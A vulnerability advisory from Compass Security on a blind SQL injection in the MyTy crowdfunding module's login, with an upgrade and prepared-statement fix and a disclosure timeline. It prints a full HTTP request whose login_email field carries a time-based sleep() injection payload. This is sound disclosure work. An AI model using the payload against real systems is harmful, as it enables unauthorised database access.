MyTy 5.1.6 Blind SQL Injection

`#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# https://www.compass-security.com/research/advisories/  
#  
#############################################################  
#  
# Product: MyTy  
# Vendor: Finlane GmbH  
# CSNC ID: CSNC-2017-029  
# CVE ID: -  
# Subject: Blind SQL injection  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Nicolas Heiniger <[email protected]>  
# Date: 21.11.2017  
#  
#############################################################  
  
Introduction:  
-------------  
MyTy[1] is a software framework that includes a crowdfunding module. It can be   
installed on a customer server and used to create whitelabel websites for   
crowdfunding platforms.  
  
Compass Security discovered a web application security flaw in the crowdfunding   
module login process that allows an unauthenticated attacker to execute   
arbitrary SQL query against the database. This allows to read and modify the   
whole database, within the privilege limitations of the database user executing   
the queries.  
  
  
Affected:  
---------  
Vulnerable:  
* MyTy 5.0.4 to 5.1.6  
  
  
Technical Description  
---------------------  
During the login process, the user email and password are sent in a POST   
request. In this request, the login_email parameter is concatenated into an SQL   
query in a way that allows for SQL injection.  
  
This was first discovered as a time-based blind injection with the following   
request:  
===============  
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1  
&type=simpleLogin&activeTab=0 HTTP/1.1  
Host: [CUT BY COMPASS]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0  
Accept: text/html, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: [CUT BY COMPASS]  
Content-Length: 154  
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;  
lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1;   
_ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703;   
cf_cookie_policy_read=1; _gat=1  
CSNC-HEN: Pentest1-Blue  
Connection: close  
  
login=1&callback=&redirect=&fwd=%252Fprojekte%252Fsuchergebnisse.html%253F  
&login_type=inline&popin=1&type=simpleLogin  
&login_email=test'%2b(select*from(select(sleep(20)))a)%2b'&login_password=1234  
===============  
  
  
Workaround / Fix:  
-----------------  
Install an up to date version of the MyTy software.  
  
As a developer:  
Strictly use prepared statements in order to protect the application from SQL   
injection.  
  
Optional addition:  
Validate all user input and filter dangerous characters, which can cause a   
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;  
  
  
Timeline:  
---------  
2017-11-21: Coordinated public disclosure date  
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7  
2017-09-06: Initial vendor response  
2017-09-06: Initial vendor notification  
2017-09-06: Discovery by Nicolas Heiniger  
  
  
References:  
-----------  
[1] https://www.finlane.com/loesungen/whitelabel-pages/  
[2] https://github.com/sqlmapproject/sqlmap  
`